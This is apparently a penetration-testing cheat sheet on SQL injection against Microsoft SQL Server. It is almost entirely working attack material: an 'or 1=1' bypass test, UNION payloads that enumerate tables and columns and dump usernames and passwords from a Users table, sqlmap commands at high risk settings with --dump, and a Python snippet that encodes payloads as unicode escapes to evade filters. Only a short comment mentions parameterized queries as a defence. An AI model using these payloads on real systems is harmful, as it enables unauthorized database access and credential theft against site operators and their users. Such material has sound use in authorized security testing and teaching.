SQL Injection
MSSQL (Microsoft SQL Server)
Test
' or 1=1-- -
Identify the number of columns
Increase the ORDER BY index, starting from column 1
' order by 1-- -
Repeat until the response errors or the content changes, e.g. ' order by 7-- -
Confirm the number of columns
' union select 1,2,@@VERSION,DB_NAME(),5,6-- -
Get tables
' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -
Get columns from table Users
' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -
Dump data from table Users
' union select 1,2,username,password,4,5 FROM Users-- -
SQLMAP
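Use a request file (-r loads a raw HTTP request saved in file.txt). Note: --risk 3 adds OR-based tests, which can modify data when the injection point sits in an UPDATE or DELETE statement.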
sqlmap -r file.txt --batch --level 5 --risk 3
POST request
sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345" --batch --dump --level 5 --risk 3
Bypass
Encode the payload as \u00XX escape sequences (UTF-16 code units)
# Re-encode each character of the typed line as a JSON-style \u00XX escape.
# The fixed "00" prefix plus a two-digit hex field means the output is a
# well-formed escape only for code points up to 0xFF.
# Defensive note: the encoding matters only when input is inspected before it
# is decoded. Validating the decoded value and binding it as a query parameter
# makes the encoding irrelevant.
raw_text = input('> ').strip()
escaped = ""
for ch in raw_text:
    escaped += "\\u00" + format(ord(ch), "02x")
print(escaped)